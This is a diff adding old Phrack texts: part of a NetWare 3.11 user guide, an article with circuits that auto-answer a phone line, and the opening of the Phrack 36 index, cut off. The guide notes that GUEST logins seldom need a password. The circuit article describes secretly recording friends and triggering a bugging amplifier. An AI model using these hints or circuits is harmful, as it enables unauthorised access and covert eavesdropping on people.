+The commands below can be used in your login script.  Each command is followed
+by its purpose and an example of how to use it.
+
+MAP INS16:=     Inserts the drive as the next available search drive.
+
+                        MAP INS16:=pd3\sys:jan
+
+MAP drive:=     Maps the specified drive to the given directory.
+
+                        MAP G:=pd3\sys:home\jan
+
+MAP *n:=        Maps the next available drive to the given directory.
+
+                        MAP *1:=pd3\sys:home\jan
+
+#               Runs an executable file (a file with an .EXE or .COM
+                extension).
+
+                        #SYSCON
+
+REMARK          These three commands allow you to insert explanatory text in
+*               the login script.  They will not appear on your screen.
+;
+                        REMARK Be sure to update the PROJECTS file.
+
+                        * Check for new mail.
+
+                        ; Assign OS-dependent Search mappings.
+
+ATTACH          Allows you to attach to other file servers while remaining
+                logged in to your current file server.
+
+                ATTACH pd3\jan
+
+SET             Allows you to set DOS variables.
+
+                SET wp="/u-jlw/"
+
+                SET usr="jwilson"
+
+IF...THEN       Executes certain commands, if a specified condition exists.
+
+                IF DAY_OF_WEEK="Monday" THEN WRITE "AARGH..."
+
+What If ...
+
+.... My login script doesn't execute all the way?
+
+o   You may have inserted an EXIT command to a batch file in the middle of your
+    login script.  Anything after the EXIT command is ignored.  Move the EXIT
+    command to the end of your login script.
+
+o   An IF...THEN clause in your login script may be incomplete or incorrect. 
+    Check the proper command format in Appendix A of NetWare v3.11
+    Installation.
+
+.... I am unable to map a drive to another file server?
+
+The file server you want to map a drive to may be down.  To check whether the
+file server is up, type
+
+        SLIST  <Enter>
+
+.... I add some mapped drives to my login script and some I wanted are gone?
+
+The system login script executes before the user login script.  You can
+overwrite the mapped drives in the system login script with those in your user
+login script.  Instead of using the command "map drive:=", use the command "map
+ins 16:=" or "map *1:=". (Remember: You can have only 26 drive mappings.)
+
+VIEW OR CREATE YOUR MAPPED DRIVES
+
+Mapped drives point to particular locations in the directory structure.  In
+NetWare, there are three type of drives: local drives, network drives, and
+search drives.  Local drives are physically attached to a workstation.  Network
+drives allow users to access particular locations in the directory structure.
+Search drives allow users to execute program files (such as applications or
+utilities) that are in a directory other than the user's current directory.
+For more information, see "Drive mappings" in NetWare v3.11 Concepts.
+
+This section tells you how to do the following:
+
+o   View all mappings
+o   Map network drives
+o   Map search drives
+
+View All Mapped Drives
+
+Type
+
+    MAP  <Enter>
+
+You see information similar to the following:
+
+    DRIVE A:  maps to a local drive
+    DRIVE B:  maps to a local drive
+
+    DRIVE F:= COUNT/SYS:  /HOME/KAREN
+    DRIVE G:= COUNT/SYS:  /
+    DRIVE H:= COUNT/ACCT: /ACCDATA
+
+    -------
+
+    SEARCH1:=Z:  [COUNT/SYS:  /PUBLIC]
+    SEARCH2:=Y:  [COUNT/SYS:  /PUBLIC/WP]
+    SEARCH3:=X:  [COUNT/ACCT:  /ACCREC]
+
+Map Network Drives
+
+Suppose you want to map a network drive to a directory in which you have files.
+To see what network drive letters are available, type
+
+    MAP  <Enter>
+
+Choose a drive letter that is not being used, such as J.  Type
+
+    MAP J:= path  <Enter>
+
+Replace path with the directory path (including the file server name and the
+volume name) leading to the directory to which you want to map network drive J.
+
+For example, suppose your username is MARIA and you want to map drive J to your
+home directory, which is on file server COUNT in volume SYS.  Type
+
+    MAP J:= COUNT/SYS:HOME/MARIA  <Enter>
+
+MAP SEARCH DRIVES
+
+Suppose your search drives appear as follows:
+
+    SEARCH1:=Z:  [COUNT/SYS:  /PUBLIC]
+    SEARCH2:=Y:  [COUNT/SYS:  /PUBLIC/WP]
+
+The next available search drive is SEARCH3 (S3).  To map a
+search drive to directory ACCREC on volume ACCT, type
+
+    MAP S3:=COUNT/ACCT:ACCREC  <Enter>
+
+When you type MAP again, the new search drive appears:
+
+    SEARCH1:=Z:  [COUNT/SYS:  /PUBLIC]
+    SEARCH2:=Y:  [COUNT/SYS:  /PUBLIC/WP]
+    SEARCH3:=X:  [COUNT/ACCT:  /ACCREC]
+
+What if ...
+
+.... I just mapped a drive and then rebooted, and now the mapped drive is gone?
+
+Did you map the drive in your login script?  Drives mapped at the command line
+are temporary----they are deleted when you log out of your file server or turn
+off your workstation.  If you want the mapping to be permanent, you must enter
+it in your login script.
+
+.... The system won't accept my mapped drives?
+
+o   You may not have rights to the directory you want to map to.  Change to
+    that directory and type
+
+        RIGHTS  <Enter>
+
+    If your rights aren't sufficient, see your supervisor.
+
+o   You may have used the wrong command format.
+
+
+.... I just viewed my mapped drives and some of them seem to be incorrect?
+
+Did you use the DOS CD command to change your default directory?  Changing
+directories changes your mapping.
+
+.... My search drives are in reverse order?
+
+Search drives are numbered, but their associated drive letters begin in reverse
+alphabetical order.  For example, the first search drive (Search 1 or S1)
+appears as network drive Z, the second one appears as network drive Y, and so
+on.  However, in your login script, they should appear in normal alphabetical
+order.
+
+SEND MESSAGES TO OTHER USERS
+
+You can communicate with other users on your network by
+sending messages from your workstation command line.
+
+This section explains how to do the following:
+
+o   Send a message to one or more users
+o   Send a message to all workstations
+o   Block/allow messages from other workstations
+
+Send a Message to One or More Users
+
+Suppose you want to send the following message to users CINDY and ERIC:
+"Meeting at 1:30 today."  Also suppose that CINDY and ERIC are logged in to
+your default server.  Type
+
+    SEND "MEETING AT 1:30 TODAY" CINDY, ERIC  <Enter>
+
+A confirmation message appears, telling you that the message was sent.
+
+If CINDY is logged in to another file server called SALES, attach to that file
+server and type
+
+    SEND "MEETING AT 1:30 TODAY" SALES/CINDY  <Enter>
+
+Send a Message to All Workstations
+
+Suppose you want to send the following message to all workstations: "Paychecks
+are here."  Type
+
+    SEND "PAYCHECKS ARE HERE." EVERYONE  <Enter>
+
+A confirmation message appears listing all the users to whom the message was
+sent.
+
+If you want to send a message to everyone on another file server, you must be
+attached to that file server and specify the name of the file server in the
+command.
+
+
+Block/Allow Messages from Other Workstations
+
+If you do not want to receive messages sent to you from any network stations,
+type
+
+    CASTOFF   <Enter>
+
+The following message appears on your screen:
+
+    Broadcasts from other stations will now be rejected.
+
+To allow your workstation to again receive messages from other network users,
+type
+
+    CASTON  <Enter>
+
+The following message appears on your screen:
+
+    Broadcast messages from the console and other stations will now be
+    accepted.
+
+What If ...
+
+.... I am unable to send a message to a user?
+
+o   Is the user logged in?  Type
+
+        USERLIST  <Enter>
+
+o   Is your message buffer full?  You can only receive up to two messages. You
+    must clear these messages from your screen (by pressing <Ctrl><Enter>)
+    before you can receive others.
+
+o   Did you type the SEND command properly?
+
+.... I am unable to send messages to users on another file server?
+
+o   Did you attach to that file server?
+o   Is the user logged in?  Type
+
+        USERLIST  <Enter>
+
+o   Did you type the SEND command properly?
+
+
+MANAGE FILES AND DIRECTORIES
+
+You can manage your files and directories in a variety of ways.  You can copy,
+delete, rename, view, write to, share, and print them.  NetWare uses a system
+of file and directory rights and attributes to make sure that only authorized
+network users can access and handle network data.
+
+Attributes are assigned to files and directories.  They override rights, which
+are assigned to users.  For example, suppose you have the right to rename files
+(the Modify right).  However, the file you want to copy is flagged with the
+Rename Inhibit attribute.  This prevents you from renaming it, even though you
+have the right to do so.
+
+For more information, see "Attributes" and "Rights" in NetWare v3.11 Concepts.
+
+Know Your Rights
+
+To view your rights in your default directory, type
+
+    RIGHTS  <Enter>
+
+If your effective rights include all rights, the following information appears:
+
+    SERVER1\SYS:PUBLIC\UTIL
+    Your effective rights for this directory are [SRWCEMFA]
+        You have Supervisor Rights to Directory. (S)
+       *May Read from File.                      (R)
+       *May Write to File.                       (W)
+        May Create Subdirectories and Files.     (C)
+        May Erase Directory.                     (E)
+        May Modify Directory.                    (M)
+        May Scan for Files.                      (F)
+        May Change Access Control.               (A)
+
+    *Has no effect in directory.
+
+    Entries in Directory May Inherit [SRWCEMFA] rights.  You have ALL RIGHTS to
+    Directory Entry.
+
+Copy a File to Another Network Directory
+
+Suppose you want to copy a file called ACC.DAT from your default directory (for
+example, F) to the SALEPROG directory in volume SYS on the file server SALES.
+First, make sure you have a drive (for example, G) mapped to SALEPROG as
+follows:
+
+    G:=SALES/SYS:SALEPROG
+
+To copy ACC.DAT from your default directory to the SALEPROG directory, type
+
+    NCOPY F:ACC.DAT TO G:  <Enter>
+
+Suppose you want to copy a file called ACC.DAT from the SALEPROG directory in
+volume SYS on the file server SALES to your default directory.  Also suppose
+drive G is mapped to SALEPROG as G:=SALES/SYS:SALEPROG.  Type
+
+    NCOPY G:ACC.DAT F:  <Enter>
+
+Copy All of a Directory's Files to Another Directory
+
+1.  Type
+
+        FILER  <Enter>
+
+    and select "Directory Contents" from the "Available Topics" menu.
+
+2.  Select the directory you want to copy from the "Directory Contents" window.
+    The "Subdirectory Options" window appears.
+
+3.  Select "Copy Subdirectory's Files."  The "Copy Subdirectory To:" window
+    appears.
+
+4.  To copy subdirectory files, complete one of the following:
+
+    o   Copy to a subdirectory in your current directory.  Type the name of the
+        directory; then press <Enter>.
+
+        You can also use <Insert> to bring up the "File Servers/Local Drives"
+        window, from which you can select your directory path by selecting file
+        server, volume, and directory options.
+
+        After you select your directory path, press <Escape> to bring your
+        cursor back to the "Copy subdirectory To:" window.  Then press <Enter>
+        to copy your subdirectory's files.
+
+    o   Copy to a directory on another volume on your file server.  Type in the
+        name of the volume and directory; then press <Enter>.
+
+        You can also use <Insert> to bring up the "File Servers/Local Drives"
+        window, from which you can select your directory path by selecting file
+        server, volume, and directory options.
+
+    o   Copy to a directory to another file server.  You must be attached to
+        the file server you want to copy files to.  Type in the name of the
+        file server, volume, and directory; then press <Enter>.
+
+Delete a File
+
+1.  Type
+
+        FILER  <Enter>
+
+2.  Select "Directory Contents" from the "Available Topics" menu.
+
+3.  Highlight the file you want to delete from the "Directory Contents" window
+    and^S press <Delete>.  Answer "Yes" in the confirmation box.
+
+    To delete more than one file, use the Mark key (<F5>) to highlight multiple
+    files; then press <Delete>.  Answer "Yes" in the confirmation box.
+
+Salvage a File You Just Deleted
+
+1.  Type
+
+        SALVAGE   <Enter>
+
+2.  Select "View/Recover Deleted Files" from the "Main Menu Options"window. 
+    To change to another volume, you must select the directory path from the
+    "Select Current Directory" option in the main menu.
+
+Note:   If you have too many salvageable files to fit on the screen, you will
+        see the heading "Inc^Qomplete."  Scroll through the list to see the
+        entire list, or use the Mark Pattern key <F6> to mark the file pattern.
+        Then exit the list and reenter it.
+
+3.  To salvage files using wildcards or to salvage a specific file, type the
+    information in the "Erased File Name Pattern To Match" window.
+
+    To view all salvageable files, press <Enter>.
+
+4.  To salvage a file, complete one of the following:
+
+    o   Salvage a single file.  Select the file you want to salvage. Select
+        "Yes" from the "Recover This File" box.
+
+    o   Salvage multiple files.  Use the Mark key (<F5>) to select multiple
+        files.  Select "Yes" from the confirmation box.
+
+    o   Salvage multiple files using wildcards.  To match a filename pattern or
+        extension, press the Mark Pattern key (<F6>) and type the pattern you
+        want to match.
+
+        Once you match the pattern of the files you want to salvage, press
+        <Enter> and select "Yes" from the "Recover ALL marked files?"
+        confirmation box.
+
+5.  Press <Escape> to exit SALVAGE.
+
+Find a Lost File
+
+Suppose you don't remember the location of a file.  The file is called
+FUTURE.DAT.  You think it may be in the PROGRAMS directory, and drive G is
+mapped to that directory.
+
+To find the location of the lost file, type
+
+    NDIR G: FUTURE.DAT  <Enter>
+
+If you don't know which directory the file is in, change directories back to
+the volume level.  Then type
+
+    NDIR filename sub  <Enter>
+
+The NDIR utility searches all those directories you have rights to on the
+volume for the file.
+
+Rename a Directory
+
+Suppose you want to change the name of the ACCT directory to PROGRAMS.  Also
+suppose drive G is mapped to ACCT in volume SYS on file server RECORDS as
+follows:
+
+    Drive G: = RECORDS/SYS:ACCT
+
+To rename the directory, type
+
+    RENDIR G: PROGRAMS  <Enter>
+
+Note:   You must be attached to a file server before you can change the name of
+        a directory on that file server.
+
+        You must also have the Modify right in the directory to rename
+        subdirectories in that directory.
+
+        Drive mappings in login scripts (if they exist) must be changed to
+        reflect the new name of the directory.
+
+What If ...
+
+.... I can't copy?
+
+o   You may not have sufficient rights.  Type
+
+        RIGHTS  <Enter>
+
+    You must have the Create right to copy files into a directory.
+
+o   The file may be flagged "non-shareable" and may be in use. Type
+
+        FLAG filename  <Enter>
+
+    If it is flagged "non-shareable," try again at a later time, when the file
+    is not in use.
+
+
+.... I can't see a directory?
+
+o   You may not have enough rights to that directory.  Type
+
+        RIGHTS  <Enter>
+
+o   The directory attribute may be set to "Hidden" or "System." Type
+
+        FLAG filename  <Enter>
+
+o   The directory may have set disk space limitations.  To view the directory
+    restrictions, type
+
+        DSPACE  <Enter>
+
+o   The directory may have been deleted.  Ask your supervisor.
+
+PRINTING
+
+Printing from a network workstation is similar to printing from a stand alone
+workstation.  When you send a print job to a network printer, however, the job
+is routed first through the file server and then delivered to the printer by
+the print server.
+
+When a print job leaves the workstation, it is stored temporarily in a print
+queue on the file server.  This queue, which is a subdirectory on the file
+server, stores the print job until the print server can deliver it to the
+printer.  When the printer is ready to service the job, the print server moves
+it from the queue to the printer.
+
+Permanently Set Up Workstation Printing
+
+If you want to print from a non-NetWare-compatible application or from the
+screen, you need to route print files from your local printer port (LPT1) to a
+file server queue.
+
+1.  Enter the SYSCON utility.
+
+2.  Select "User Information" from SYSCON's main menu.
+
+3.  Select your username.
+
+4.  Select "Login Script."
+
+5.  Insert the following command into the login script:
+
+        #CAPTURE Q=queuename TI=5
+
+6.  Exit SYSCON, saving changes when prompted.
+
+7.  Log back in to or reboot your workstation to allow the CAPTURE command to
+    take effect.
+
+Print Screens Using CAPTURE
+
+Before you start printing screens using CAPTURE, you need to set the CAPTURE
+parameters in your login script.  See "Permanently Set Up Workstation Printing"
+on the previous page. Also, your supervisor needs to set up a default queue.
+
+1.  At the command line, type
+
+        CAPTURE  <Enter>
+
+    You can include any of the CAPTURE options except Show.  Some of the most
+    common CAPTURE options are the following:
+
+    L=n
+        Indicates which of your workstation's LPT ports (local parallel
+        printing ports) to capture.  Replace "n" with 1, 2, or 3.  Default:
+
+  ^S^Q      L=LPT1
+
+    Q=queuename
+        Indicates the queue the print job should be sent to.  If multiple
+        queues are mapped to a printer, you must include this option.  Replace
+        "queuename" with the name of the queue.
+
+    TI=n
+        Indicates the number of seconds between the last time the application
+        writes to the file and the time it releases the file to the queue. 
+        Include this option if you want to print from an application without
+        exiting the application.  Replace "n" with a number of seconds
+        (1-1000).  Default: TI=O  (Timeout disabled)
+
+2.  Access the application containing the screen you want to print.
+
+3.  Press <Shift><Print Screen>.
+
+4.  If you want to print more screens, repeat steps 2 and 3.
+
+5.  When you have selected the screens you want printed, return to the DOS
+    prompt and type
+
+        ENDCAP  <Enter>
+
+    ENDCAP sends your print job to the default print queue of your default file
+    server, and then the job is printed. ENDCAP also ends the capture of your
+    LPT port.
+
+Note:   Your workstation might hang if you press the <Shift><Print Screen> keys
+        when none of your LPT ports are captured and no local printers are
+        attached to your workstation.  To prevent this, ask your supervisor to
+        include the following line in the SHELL.DFG file on your workstation
+        boot disk.
+
+        LOCAL PRINTERS = 0
+
+List the Jobs in a Queue
+
+A queue is a special directory where print files are stored while waiting for
+printer services.  To see which jobs are waiting in a queue to be printed,
+complete the following steps:
+
+1.  Type
+
+        PCONSOLE  <Enter>
+
+2.  Select your file server (if other than your current file server).
+
+3.  Select "Print Queue Information" from the "Available Options" menu.
+
+4.  Select the print queue whose print job you want to view.  If you don't know
+    the name of the print queue, ask your supervisor.
+
+5.  Select "Current Print Job Entries" from the "Print Queue Information" list.
+    The print job entries are displayed.
+
+Delete Your Print Job from a Queue
+
+You can cancel your print job by deleting it from the print queue (even after
+the job has started printing).  You can delete a print job only if you are the
+owner of the job or if you are the print queue operator.
+
+To delete your print job, complete the following steps:
+
+1.  Type
+
+        PCONSOLE  <Enter>
+
+2.  Select "Print Queue Information" from the "Available Options" menu.
+
+3.  Select the print queue whose entries you want to view.  The "Print Queue
+    Information" list is displayed.
+
+4.  Select "Current Print Job Entries."
+
+5.  Highlight the print job entry and press <Delete>.
+
+6.  Select "Yes" at the confirmation box.
+
+What If...
+
+.... I send commands to print a screen, but it doesn't print?
+
+Did you include the CAPTURE command in your login script?  See a previous
+section called "Permanently Set Up Workstation Printing."
+
+.... The application I'm using says that the print job was sent, but it doesn't
+print out?
+
+o   Did you use CAPTURE to redirect output to a print queue first?
+
+o   Are the LPT ports captured?  Type
+
+        CAPTURE SH  <Enter>
+
+o   Check PCONSOLE and find the appropriate queue.  If the queue has a long
+    list of jobs and none are marked "active," see your print server operator.
+    If your job isn't in the queue, the application is not set up properly;
+    check with the applications expert.
+
+COMMON ERROR MESSAGES
+
+Error messages point to a software or hardware error that doesn't allow further
+processing.  An explanation of the nature of the message and a recommended
+course of action follow each message listed below.
+
+"Access denied"
+
+Explanation 1
+
+This message indicates one of the following:
+
+o   You entered your username, your password, or both incorrectly.
+o   You tried to log in to a file server on which you are not defined as a
+    user.
+
+Action 1
+
+Try to log in again and make sure you type the username and password correctly.
+Make sure you are logging in to a file server on which you are defined as a
+user or as a member of a group.  You can log in to most file servers as GUEST
+because user GUEST seldom requires a password.
+
+Explanation 2
+
+You tried to copy, delete, rename, or modify the file attributes of a file for
+which you lack rights.
+
+Action 2
+
+Find out about your rights to this file by typing
+
+    RIGHTS filename  <Enter>
+
+or by asking your supervisor.
+
+
+
+"A File Server could not be found"
+
+Explanation
+
+The shell tried to build a connection with the network, but no file server
+responded to the request in the given time limit.
+
+Action
+
+Check the cable connection and make sure at least one active file server exists
+on the network.  Also ask your supervisor to make sure the IPX file and the
+network board have the same configuration.
+
+
+"Message NOT sent to <servername>/<username> (station number)"
+
+Explanation
+
+If a number of messages have been sent to the user or group and have not been
+cleared, either of the following may be true:
+
+o   The workstation's buffer for incoming messages may be full.
+
+o   The message was not sent to the user or group because the user or group
+    used the CASTOFF utility.
+
+Action
+
+Send the message later, or try another method of communication.
+
+
+"Network Error <cause> during <operation>.  File = <drive>:<filename> Abort,
+Retry or Fail?" (or "Abort, Retry?")
+
+Explanation 1
+
+The shell called a function call or a DOS interrupt, but the specified
+operation could not be performed.  The <drive>:<filename> specify the drive and
+filename on which the error condition occurred.
+
+Action 1
+
+Press the R key to retry the operation and, if necessary, repeat this several
+times.  If the problem persists, ask your supervisor or look up the specific
+message in NetWare v3.11 System Messages.
+
+Explanation 2
+
+Your file server may be down.
+
+Action 2
+
+Press the A key to abort the operation, and then try to connect to the file
+server again.  If this attempt fails, contact your supervisor.
+
+"Password has expired"
+
+Explanation
+
+This message indicates your password has expired.
+
+The network supervisor can require users to periodically change their passwords
+on the file server to protect the file server from access by unauthorized
+persons.  The network supervisor can also assign a number of grace logins
+during which users can still use their old passwords (after they have expired)
+before having to create new passwords.
+
+Action
+
+Use the SETPASS command to change your password.  If you use the old password
+during your remaining grace logins, be sure to change it before you run out of
+grace logins, or else your network supervisor has to change it for you.
+
+"Password has expired and grace period has also expired."
+
+Explanation
+
+This message indicates that your user account is locked because your password
+has expired and you have used all your grace logins.
+
+After your password expires, you may have a number of grace logins during which
+you can still use your old password.  If you do not change your password before
+your grace logins are used, you are denied access.
+
+Action
+
+Since you have run out of grace logins, you cannot access your account until
+your network supervisor or manager assigns you a new password.
+
+"Server <servername> not found"
+
+Explanation
+
+This message indicates that you tried to attach to the file server
+<servername>, but the file server did not respond for one of the following
+reasons:
+
+o   You mistyped the name of the file server.
+o   You specified a file server not cabled to your network.
+o   You specified a file server that is down for system maintenance.
+
+Action
+
+o   Type the file server name correctly.
+
+o   Use the SLIST command to list all the available file servers.
+
+o   If the file server is down for maintenance, try the command later when the
+    file server has been brought back up.
+
+If you still have problems, ask your network supervisor for help.
+
+"Unable to attach to server <servername>"
+
+Explanation
+
+This message indicates one of the following:
+
+o   You mistyped the name of the file server.
+o   You specified a file server not cabled to your network.
+o   You specified a file server that is down for system maintenance.
+
+Action
+
+o   Type the file server name correctly.
+
+o   Use the SLIST command to list all available file servers.
+
+o   If the file server is down for maintenance, try the command later when the
+    file server has been brought back up.
+
+If you still have problems, ask your network supervisor for help.
+
+"User <fileserver>/<username> not found"
+
+Explanation
+
+This message indicates that you either specified a user who does not exist on
+<fileserver> or mistyped the user's name.
+
+Action
+
+o   Make sure you have typed the user's name correctly.
+
+o   If you are not certain which users are established on the file server, use
+    the SYSCON utility to view the list of network users.
+
+o   You can also use the USERLIST command to view a list of currently attached
+    users.
+
+(----------------------------------------------------------------------------)
+
+One of the most useful tools that any Novell Network user can have is access to
+Netwire on Compuserve.  Netwire is a forum that contains messages, files, and
+access to Novell product information firsthand.  You can submit questions to
+Novell technicians and hundreds of other Novell users.  A must for any Netware
+user.
+
+Another handy tool for those that do have access is the SALVAGE program.
+SALVAGE will let you undelete files throughout the system unless the directory
+is marked to be purged.  PURGE is nice too because it will allow you to
+completely erase any files you created or copied.  To use purge and or salvage
+make sure you are mapped to the public directory and execute them from any DOS
+prompt.
+
+(----------------------------------------------------------------------------)
+
+As far as dialing up a Novell Network the means are unlimited.  Some have very
+tight security systems that only let users with certain hardware dial-in and
+others limit the usernames that are allowed dial-in access.
+______________________________________________________________________________
diff --git a/phrack35/9.txt b/phrack35/9.txt
new file mode 100644
index 0000000..6466207
--- /dev/null
+++ b/phrack35/9.txt
@@ -0,0 +1,155 @@
+                                ==Phrack Inc.==
+
+                Volume Three, Issue Thirty-five, File 9 of 13
+
+                //////////    //////////////////////////////////////
+               //  C   //    //                                  //
+              //  r   //    //  A U T O - A N S W E R   I T !   //
+             //  e   //    //                                  //
+            //  a   //    //////////////////////////////////////
+           //  t   //
+          //  e   ////////////////////////////////////////////
+         //  d     B y :     T w i s t e d   P a i r       //
+        ////////////////////////////////////////////////////
+
+     Many times I've wanted to be able to start and/or listen to devices at my
+home when I'm somewhere else.  I've developed the following circuits to do this
+for me.  The circuits have all kinds of uses.  I'll let your mind ponder the
+endless fun activities you can have.  Some of the things I have used them for
+are monitoring my own house, tape record my friends for fun without their
+knowledge, or listen to a radio station when you're out of town, etc.
+
+                 /////   Automatically Answer a Phone   /////
+
+     This has got to be the best way to automatically answer the phone.  With
+just 2 parts, we can couple an audio source into a phone line.  The cost will
+be less than $5 no matter where you get the parts!
+
+
+                       .  .                  Radio Shack
+                    .        . / ECG 6412     273-1374 Transformer
+Red                __        __  Diac             /
+(+)  O-------------I\        /I------------) || (---------O  <-
+Tip                . \      / .            ) || (
+                    ._\____/_.             ) || (             Audio Source
+                       .  .                ) || (              feeding IN
+Green                                      ) || (             to transformer
+(-)  O-------------------------------------) || (---------O   <-
+Ring
+
+     The "Diac" or "Bilateral Trigger Diode" looks like an open circuit until a
+voltage of either polarity is applied that is above its threshold of 63 Volts.
+(plus or minus 7 Volts) When this voltage is exceeded, like when the line
+rings, the device acts as a switch and goes into conduction.  This "answers"
+the phone and holds the line through the transformer, which couples the audio
+to the line.
+
+     When the caller hangs up, most telephone companies provide a momentary
+reversal of Tip and Ring which causes the Diac to stop conducting and release
+the line.
+
+             /////   Another Way to Automatically Answer   /////
+
+     For those who want to really play with this circuit, I suggest the
+following additions.  I have added a bridge rectifier and an optical coupler to
+the circuit. The bridge just makes sure that the LED inside the optical coupler
+gets the proper polarity.  If you are careful to observe polarity when
+connecting to Ma Bell, you can leave out the diodes and save a little money.
+
+                                    .   .
+                                  .       .                   Radio Shack
+     |----------|-----------------__     __---------------|    273-1374
+     |          |               .I\      /I.              |   Transformer
+    ---        ---               ._\____/_.               |--) || (-----O
+    \ /        \ /                  .  .                     ) || (
+    ---        ---                ECG 6412                   ) || (   Audio
+ O---|          |                   Diac                     ) || (   Source
+Tip  |     O----| 1N4003 Diodes                              ) || (
+(+)  |  Ring    |    ( 4 )                                |--) || (-----O
+    ---  (-)   ---              ECG 3045  Optical Coupler |
+    \ /        \ /             ______________    /        |
+    ---        ---            |              |            |
+     |          |           2 |     |\ |     | 1          |
+     -------------------------------| \|------------------|
+                              |     |/ |     |
+                              |              |
+                              |      \ \     |
+                              |       v v    |
+                              |   ________   |
+                              |    /    \    |
+                              |   V      \   |
+                              |___|______|___|
+                                  |      |
+                                4          5
+
+     Pins 4 and 5 on the optical coupler can be wired to remotely start a
+device upon answering the line.  An example would be a tape machine or battery-
+powered bugging amplifier.  Be careful not to connect anything over 25 volts to
+pins 4 and 5 to avoid frying the opto-coupler.  Either circuit will accommodate
+an extra LED that could be used as a status indicator.  Just be sure to keep
+the polarity proper and put it in series with the other components.
+
+     The Audio Source can be almost ANYTHING.  If you want to hook up a
+microphone as the Audio Source, connect the microphone to some kind of
+amplifier first, then to the transformer.
+
+           /////   An Interesting Catalog to Read Through   /////
+
+     If you really want to get fancy, you could consider ordering a free
+catalog from Monroe Electronics.  They sell the following products you might
+wish to play with.  Use these as building blocks to make whatever you need...
+
+   DTMF Decoders  (a) Which provide a momentary or latching relay
+   -------------      output for the duration of time the DTMF digit
+                      is being pressed.  (If you're really obnoxious,
+                      you'd use one of these with one of the above
+                      circuits.  Then you could call and randomly turn
+                      things on and off like maybe a TV scrambler/
+                      jammer.)
+
+                  (b) Which can accept multiple digits and be programmed
+                      for a momentary or latching relay output.  (Use one
+                      of these to make a DTMF combination lock for your
+                      BBS.  Or use as a call screener, i.e. only the
+                      correct DTMF sequence could make your phone actually
+                      ring)
+
+                  (c) Which can control access by a 4 digit code to latch
+                      a relay, then a single digit to unlatch it.  (A
+                      little bit more sophisticated than (b) above.
+
+    DTMF Encoders     Which can convert BCD to DTMF tones. Crystal-
+    -------------     controlled, of course. 600-ohm audio output.
+                      (Use one of these to convert your computer's 
+                      output into ANY DTMF tones of your choosing.  You'd
+                      be able to choose the duration as well!  Then this
+                      circuit would couple your evil DTMF into the phone
+                      line)
+
+    Audio Detectors   Detect BUSY and DIAL TONE and operate a relay.
+    ---------------   (Useful when making scanning hardware/software
+                      applications)  
+
+    Audio Generators  Generate Ring Tone, Dial Tone, Busy Tone, Tone
+    ----------------  Burst, etc.  (Start your own phone company.  Fool
+                      your friends, trip out the operator)
+
+
+     Dial-up DTMF remote control systems which can be used to control and
+     monitor remote relays and status inputs at unattended sites.
+     They can also provide automatic dialing of stored phone numbers to
+     report status of inputs, and can make use of an internal timer to
+     execute control commands.  (Water strange plants by call-in remote
+     control, check moisture levels, see if a certain mailbox is empty
+     or full, have the mailbox CALL you when something is delivered,
+     etc.  Do I have to tell you everything?  Just get the catalog!)
+
+
+Their address is:
+                    MONROE ELECTRONICS, INC.
+                    100 HOUSEL AVENUE
+                    LYNDONVILLE  NY  14098
+                    (716) 765-2254
+
+//////////////////////\/\/- T W I S T E D  P A I R-/\/\////////////////////////
+_______________________________________________________________________________
diff --git a/phrack36/1.txt b/phrack36/1.txt
new file mode 100644
index 0000000..9f78ad4
--- /dev/null
+++ b/phrack36/1.txt
@@ -0,0 +1,152 @@
+                                ==Diet Phrack==
+
+                 Volume Three, Issue Thirty-Six, File 1 of 11
+
+                               Issue XXXVI Index
+                               _________________
+
+                               P H R A C K   3 6
+
+                               December 31, 1991
+                               _________________
+
+                   "You've Got The Right One Baby, UH HUH!"
+
+     Happy New Year Everyone!  HoHoCon'91 is behind us and with the end of the
+year is the end of the third volume of Phrack.  This special issue is called
+Diet Phrack because of the whole Phrack vs. Phrack Classic crisis (which is
+probably more KL's doing than anyone elses) that went on during the middle of
+volume three.
+
+     Diet Phrack was conceived in August 1991 during PartyCon when Dispater,
+Knight Lightning, and several other friends gathered to party and bitch about
+where Phrack was and wasn't going.  Eventually this led to the new Phrack staff
+that began with Phrack 33.
+
+     Diet Phrack is also the long-awaited sequel to Phrack 13 (which some
+consider the most worthless issue ever, but its probably because they weren't a
+part of Phrack's main circle of friends and didn't understand all the private
+jokes).
+
+
+COMMENTS AND OBSERVATIONS CONCERNING HOHOCON'91
+
+                                "Phrack sucks!"
+
+     Well that was certainly a common remark at HoHoCon and considering that
+the majority of the attendees were local Houston losers expecting us to print
+codes and passwords for them, we weren't really surprised.
+
+     Do you think Phrack sucks?  You probably aren't reading this if you do,
+but seriously, if you really think it sucks you can fuck off.  You are welcome
+to go start your own magazine with the latest scans of c0dEz and VMBs (that
+will sure be useful after about a week).  That is not what we are about.
+
+     Why don't you try writing something yourself instead of copying useless
+material directly out of the Bellcore Catalog?  Why don't you actually do
+something like hack instead of expecting others to do it for you?!?
+
+     When Dispater stood up at HoHoCon and asked the crowd what kind of systems
+they hacked and what they were interested in learning about, the 70 people
+sitting there just looked around like a bunch of grazing cows (no pun or
+offense intended to our friends in -cDc-, oooM!)
+
+     It's pretty obvious to us that the people who complain most about Phrack
+don't even bother to read it.  At least they would know the correct spelling of
+our names.
+
+     Phrack is about technology, how to create it, how to use it, and the
+implications that always arise from it.  Phrack is not designed to do the
+hacking for you.  For some, Phrack is a hacker "primer."  Generally we expect
+that the reader already has a reasonable level of intelligence to begin with.
+In Houston that maybe that was to great an expectation.
+
+THANKS
+
+     The Phrack Staff would like to thank the people in Cult of the Dead Cow,
+the people at WorldView that took the time to chat, the one guy from Digital
+Murder (who's name esacpes me at the moment) and NCC for being some of the
+coolest people we met while at the conference.  Thanks to NIA Magazine, CUD,
+and everyone else that promoted it.  Furthermore, a very special thanks goes to
+Drunkfux of dFx International.  If not for him, HoHoCon'91 would not have
+happened!!  Additionally this would mean that hordes of people drugged up on
+Marshmellow Hex sitting in a hallway with a laptop would not have created
+Cyberwaste; and, Demon Seed would not be alive.  Check out cDc #200 for
+details!  Thanks to Erik Bloodaxe for providing the flicks that some could not
+stomach (after too much beer & assorted beverages)!  So thanks again Drunkfux.
+Nelson is my favorite. (!)
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+                      HOW TO SUBSCRIBE TO PHRACK MAGAZINE
+
+     The distribution of Phrack is now being performed by the software called
+Listserv.  All individuals on the Phrack Mailing List prior to your receipt of
+this letter have been deleted from the list.
+
+If you would like to re-subscribe to Phrack Inc. please follow these
+instructions:
+
+1.  Send a piece of electronic mail to "LISTSERV@STORMKING.COM".  The mail
